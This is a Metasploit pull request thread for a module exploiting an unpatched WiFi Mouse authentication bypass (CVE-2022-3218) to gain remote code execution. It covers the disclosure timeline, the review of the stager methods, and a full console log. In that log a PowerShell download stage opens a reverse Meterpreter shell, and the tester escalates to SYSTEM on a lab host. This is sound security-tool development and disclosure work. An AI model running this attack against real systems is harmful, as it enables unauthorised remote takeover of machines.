wifi mouse rce
rapid7/metasploit-framework pull request #16985
Opened 2022-09-05 12:24 UTC by h00die

This PR adds a new module to exploit an auth bypass to rce in 'wifi mouse'.
Leaving it draft right now, talking to @todb / @todb-r7 about a possible CVE for it.

@H4rk3nz0 looks like you were the original author (and your twitter is gone), did you ever reach out to the company to responsibly disclose?

This is a neat exploit as you connect to the server, ask it to open cmd, then type out what you want on the user's screen. its fun to watch shell code :).  Wrote in a cmdstager method, but due to the payload length and it appearing on the user's screen, its unreliable (needs ~3.5min of solitude).  If the user types anything or moves the focus to another window, exploit will fail.  wrote second method which uses what the original exploit does to host the payload on a web server and just download it. MUCH faster and more reliable.

## Verification

- [ ] install and start software. i tried it on the one linked in EDB and the most recent one on the website
- [ ] Start `msfconsole`
- [ ] `use exploit/windows/misc/wifi_mouse_rce`
- [ ] Set `rhost` and `lhost` as required.
- [ ] `run`
- [ ] **Verify** it works via both methods (targets)
- [ ] **Document** looks good

2022-09-05 15:50 UTC, h00die commented
@H4rk3nz0 do you have dates for when you reached out, and to what email (or a timeline in general you can share)?  Just for making sure we have all the ducks in a line for the CVE

2022-09-05 17:04 UTC, H4rk3nz0 commented
@h00die I reached out on the 25th of Feb 2021 to developer email (wangshimeng@gmail.com). The same day as I discovered the flaw.

2022-09-08 14:10 UTC, adfoster-r7 commented on modules/exploits/windows/misc/wifi_mouse_rce.rb
> +    elsif target.name == 'pull'
Is there any additional context on why we need the additional pull target here? Does the normal `execute_cmdstager` with `'CmdStagerFlavor' => [ 'certutil', 'vbs' ]` being set not work in a similar fashion? 👀

2022-09-08 21:17 UTC, h00die commented on modules/exploits/windows/misc/wifi_mouse_rce.rb
> +    elsif target.name == 'pull'
certutil prints base64 to screen, then uses `certutil` to decode it to an exe. same with `vbs`

2022-09-08 21:56 UTC, h00die commented on modules/exploits/windows/misc/wifi_mouse_rce.rb
> +    elsif target.name == 'pull'
However, `psh_invokewebrequest` does work. I'll have an update to the code tomorrow w/ this added, and certutil still there (vbs removed). `psh_invokewebrequest` is the stager default since its fast.

2022-09-14 20:43 UTC, todb-r7 commented
Hi @h00die thanks for the alert. I've reserved CVE-2022-3218 for this.

2022-09-21 20:02 UTC, gwillcox-r7 requested changes
Reviewed documentation, review on module code to come next.

2022-09-21 20:17 UTC, h00die commented on documentation/modules/exploit/windows/misc/wifi_mouse_rce.md
> +msf6 exploit(windows/misc/wifi_mouse_rce) > run
in the past we didn't show things if they weren't changed from default, showing options will take a whole bunch of room in docs

2022-09-21 20:21 UTC, H4rk3nz0 commented
I see the layer 8 issue has arisen.

2022-09-21 20:21 UTC, h00die commented on documentation/modules/exploit/windows/misc/wifi_mouse_rce.md
> +msf6 exploit(windows/misc/wifi_mouse_rce) > run
I have updated the PR description to account for changes in the code.  1 target, `cmdstager`

2022-09-21 20:34 UTC, h00die commented on documentation/modules/exploit/windows/misc/wifi_mouse_rce.md
> +Versions 1.8.3.4 (current as of module writing) and before are vulnerable.
also needed to write that version into module description

2022-09-21 20:34 UTC, h00die commented on documentation/modules/exploit/windows/misc/wifi_mouse_rce.md
> +### Stager
updating the docs to point that out and make the distinction

2022-09-21 20:39 UTC, h00die commented
updated the docs w/ some of your changes, and a bunch of the review comments. Things should be clearer now for the starger/target stuff

2022-09-23 19:21 UTC, gwillcox-r7 commented
Tested and working like a charm. Pushing up final minor edits for documentation purposes and then this will be good to land.

```
msf6 > use exploit/windows/misc/wifi_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/misc/wifi_mouse_rce) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/misc/wifi_mouse_rce) > set RHOSTS 172.20.16.241
RHOSTS => 172.20.16.241
msf6 exploit(windows/misc/wifi_mouse_rce) > set LHOST 172.20.18.73
LHOST => 172.20.18.73
msf6 exploit(windows/misc/wifi_mouse_rce) > show options

Module options (exploit/windows/misc/wifi_mouse_rce):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LINEMAX  1020             yes       Maximum length of lines to send for stager method.  Smaller for more unstable connections.
   RHOSTS   172.20.16.241    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    1978             yes       Port WiFi Mouse Mouse Server runs on (TCP)
   SLEEP    1                yes       How long to sleep between commands
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.20.18.73     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   stager


msf6 exploit(windows/misc/wifi_mouse_rce) > exploit

[*] Started reverse TCP handler on 172.20.18.73:4444 
[*] 172.20.16.241:1978 - Opening command prompt
[*] 172.20.16.241:1978 - Typing out payload
[*] 172.20.16.241:1978 - Using URL: http://172.20.18.73:8080/e0YwYxi
[*] 172.20.16.241:1978 - Client 172.20.16.241 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.20348.859) requested /e0YwYxi
[*] 172.20.16.241:1978 - Sending payload to 172.20.16.241 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.20348.859)
[*] Sending stage (200774 bytes) to 172.20.16.241
[*] 172.20.16.241:1978 - Command Stager progress - 100.00% done (145/145 bytes)
[*] Meterpreter session 1 opened (172.20.18.73:4444 -> 172.20.16.241:60802) at 2022-09-23 14:19:28 -0500
[*] 172.20.16.241:1978 - Server stopped.

meterpreter > getuid
Server username: DAFOREST\Administrator
meterpreter > sysinfo
Computer        : WIN-BR0CCBA815B
OS              : Windows 2016+ (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : DAFOREST
Logged On Users : 12
Meterpreter     : x64/windows
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeEnableDelegationPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeMachineAccountPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
```

2022-09-23 19:21 UTC, gwillcox-r7 approved these changes

2022-09-23 19:48 UTC, merged

2022-09-23 19:50 UTC, gwillcox-r7 commented
# Release Notes
A new module has been added for CVE-2022-3218, an unpatched authentication bypass in WiFi Mouse (Mouse Server) from Necta LLC which can be used to gain RCE as the user running Wifi Mouse (Mouse Server).